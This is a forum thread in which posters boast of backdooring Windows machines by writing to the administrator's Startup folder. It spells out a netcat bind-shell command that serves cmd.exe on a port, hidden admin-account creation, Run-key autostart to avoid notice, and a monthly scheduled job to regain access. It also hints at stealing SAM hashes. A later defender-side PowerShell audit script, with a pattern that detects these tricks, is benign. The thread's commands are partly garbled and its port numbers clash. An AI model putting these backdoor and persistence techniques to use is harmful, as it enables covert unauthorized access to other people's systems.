start menu trick...

    I was amazed to see a big security hole (as big as a pumpkin) that could be exploited in Windows!!!
    Ya, in Windows even the guest account has the right to peep inside 'C:\Documents and Settings\administrator\Start Menu\Programs\Startup'!!!!!

    !!! After all, it's the administrator's startup... but everyone has the freedom to copy and paste almost anything into that folder!!! In Windows... <Mr. Gates... why didn't you think about this!>

    Ya, the admin startup could be followed by a script for scandisk, writing registry values, formatting, or upgrading the partition to NTFS after the following reboot!... or???

    <hUNT3R] wonders how many Windows users keep a constant eye on their startup files.... [/hUNT3R>
    < Have you been infected by a Trojan!!! ...long ago????
    This proves... you don't! keep your... eye......... >

    If there is still anyone who wonders how I got the admin access and enjoyed the rights,

    Here is what I did!
    I created a hidden script that did this... <of course in hidden mode!>
    And executed the command with the help of a batch file...

    c:\windows\system32\> nc.exe -L -d -e c:\windows\system32\cmd.exe -p 1773

    WOW, now netcat launched itself in Trojan mode on every startup! Binding to port 1337
    and giving you a cmd.exe _"shell"_ when you telnet into the PC...
    So now you can get back into the network whenever you wish!!! <Is anybody thinking about backing up SAM accounts...??? >


    This is inaccurate.

    The Administrator's profile is, by default, only accessible to them. The ACL is set when the user's profile is created. So to get "administrator" privileges, either you have to be running on a FAT filesystem (i.e. not recommended by MS) or have administrator rights already (pointless, eh?)

    This is not a real issue.

    I've done that netcat trick a few times myself, but it's probably easier to do this in your batch file:

    netusers batman robin /add && netgroups administrators batman /add

    robin being the password; of course you can change this to whatever suits you. What I also like to do is add that command line into the registry, so it auto-starts without launching a batch script as the admin logs in; they tend to notice DOS windows opening and closing quickly.

    You can even do a combination of the netcat and the user-add trick with your batch script, but even slicker than that is to schedule it to run. Place your batch script in the %systemdrive%\windows\system32 or %systemdrive%\winnt\system32 folder, then use the M$ "AT" command to schedule it to run about once a month, so in case the account gets deleted, you'll have access again in the near future.
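    A defender-side audit of the three persistence spots this thread names (a Startup folder writable by low-privilege accounts, Run keys, and scheduled tasks), added here as an example; it is not code from any poster. It assumes a modern Windows with PowerShell 5+ and the ScheduledTasks module, and the paths and the `$suspicious` pattern are my own choices.

```powershell
# Audit the persistence spots discussed in the thread from the defender's side.
# Assumptions (mine, not the thread's): PowerShell 5+, ScheduledTasks module available.
$startupDirs = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
)
$broadPrincipals = 'Everyone|BUILTIN\\Users|Authenticated Users|Guests'
$writeRights     = 'Write|Modify|FullControl|CreateFiles'

foreach ($dir in $startupDirs) {
    if (-not (Test-Path $dir)) { continue }
    # A Startup folder that broad principals can write to is the thread's "pumpkin".
    $loose = (Get-Acl $dir).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -match $broadPrincipals -and
        $_.FileSystemRights  -match $writeRights
    }
    foreach ($ace in $loose) {
        Write-Warning "$dir writable by $($ace.IdentityReference) ($($ace.FileSystemRights))"
    }
    Get-ChildItem $dir -Force | ForEach-Object { "Startup item: $($_.FullName)" }
}

# Anything that looks like a bound shell or account manipulation at startup.
$suspicious = 'nc(\.exe)?\s|netcat|\s-e\s+\S*cmd\.exe|net\s+user\b|net\s+localgroup\b'
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PowerShell provider metadata
        $line = "$key\$($p.Name) = $($p.Value)"
        if ($p.Value -match $suspicious) { Write-Warning "Suspicious Run entry: $line" }
        else { $line }
    }
}

# The AT-style monthly task that re-creates an account or re-launches a batch file.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match $suspicious -or $cmd -match '\.bat\b|\.cmd\b') {
            Write-Warning "Review task '$($task.TaskPath)$($task.TaskName)': $cmd"
        }
    }
}
```

    Run it from an elevated prompt so HKLM and the all-users Startup folder are readable; warnings, not the plain listing lines, are the items worth a second look.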

    you almost made it. Rofl

    Yap, I am talking about FAT32. There are still dozens of admins using FAT32 for their convenience... You can't just babble around with your poor words, brother, because FAT32 exists in the world. Don't be specific, and think dynamic...

    < It's like, I am talking about a disease that could infect you... you cry all around 'I AM VACCINATED', that's pointless...>

